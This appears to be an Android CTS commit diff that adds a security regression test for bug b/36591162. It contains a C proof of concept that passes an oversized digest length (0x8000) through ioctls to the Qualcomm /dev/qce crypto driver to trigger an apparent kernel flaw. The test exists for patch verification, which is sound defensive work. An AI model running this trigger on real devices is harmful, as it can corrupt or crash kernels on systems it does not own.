Merge "CTS/STS test for Android Security b/36591162" into nyc-mr2-dev
am: a87a94fe95
Change-Id: I98b6044355f37877cb998a5e9952d1710049efd2
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index 9a444ae..c0193a2 100644
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -98,6 +98,7 @@
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
<option name="push" value="Bug-36266767->/data/local/tmp/Bug-36266767" />
+ <option name="push" value="Bug-36591162->/data/local/tmp/Bug-36591162" />
<option name="append-bitness" value="true" />
</target_preparer>
diff --git a/hostsidetests/security/securityPatch/Bug-36591162/Android.mk b/hostsidetests/security/securityPatch/Bug-36591162/Android.mk
new file mode 100644
index 0000000..ee17cb7
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-36591162/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := Bug-36591162
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/Bug-36591162/poc.c b/hostsidetests/security/securityPatch/Bug-36591162/poc.c
new file mode 100644
index 0000000..33ee5f6
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Bug-36591162/poc.c
@@ -0,0 +1,89 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <sys/ioctl.h>
+#include <sys/mount.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <fcntl.h>
+#include <errno.h>
+#include <pthread.h>
+#include <stddef.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+enum qcedev_sha_alg_enum {
+ QCEDEV_ALG_SHA1 = 0,
+ QCEDEV_ALG_SHA256 = 1,
+ QCEDEV_ALG_SHA1_HMAC = 2,
+ QCEDEV_ALG_SHA256_HMAC = 3,
+ QCEDEV_ALG_AES_CMAC = 4,
+ QCEDEV_ALG_SHA_ALG_LAST
+};
+
+struct buf_info {
+ union {
+ uint32_t offset;
+ uint8_t *vaddr;
+ };
+ uint32_t len;
+};
+
+struct qcedev_sha_op_req {
+ struct buf_info data[16];
+ uint32_t entries;
+ uint32_t data_len;
+ uint8_t digest[32];
+ uint32_t diglen;
+ uint8_t *authkey;
+ uint32_t authklen;
+ enum qcedev_sha_alg_enum alg;
+};
+
+#define QCEDEV_IOC_MAGIC 0x87
+
+#define QCEDEV_IOCTL_SHA_INIT_REQ \
+ _IOWR(QCEDEV_IOC_MAGIC, 3, struct qcedev_sha_op_req)
+#define QCEDEV_IOCTL_SHA_UPDATE_REQ \
+ _IOWR(QCEDEV_IOC_MAGIC, 4, struct qcedev_sha_op_req)
+#define QCEDEV_IOCTL_SHA_FINAL_REQ \
+ _IOWR(QCEDEV_IOC_MAGIC, 5, struct qcedev_sha_op_req)
+
+void main() {
+ int f = open("/dev/qce", 0);
+
+ struct qcedev_sha_op_req arg;
+ memset(&arg, 0, sizeof(arg));
+ arg.alg = QCEDEV_ALG_AES_CMAC;
+ arg.entries = 1;
+ arg.authklen = 16;
+ char *key = malloc(arg.authklen);
+ arg.authkey = key;
+ arg.data_len = 256;
+
+ arg.data[0].len = arg.data_len;
+ char *data = malloc(arg.data_len);
+ arg.data[0].vaddr = data;
+ int r = ioctl(f, QCEDEV_IOCTL_SHA_INIT_REQ, &arg);
+
+ arg.diglen = 0x8000;
+ r = ioctl(f, QCEDEV_IOCTL_SHA_UPDATE_REQ, &arg);
+ r = ioctl(f, QCEDEV_IOCTL_SHA_FINAL_REQ, &arg);
+}
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_08.java b/hostsidetests/security/src/android/security/cts/Poc17_08.java
index aeea5e3..5b633f4 100644
--- a/hostsidetests/security/src/android/security/cts/Poc17_08.java
+++ b/hostsidetests/security/src/android/security/cts/Poc17_08.java
@@ -29,4 +29,15 @@
enableAdbRoot(getDevice());
AdbUtils.runPoc("Bug-36266767", getDevice(), 60);
}
+
+ /**
+ * b/36591162
+ */
+ @SecurityTest
+ public void testPocBug_36591162() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/qce")) {
+ AdbUtils.runPoc("Bug-36591162", getDevice(), 60);
+ }
+ }
}
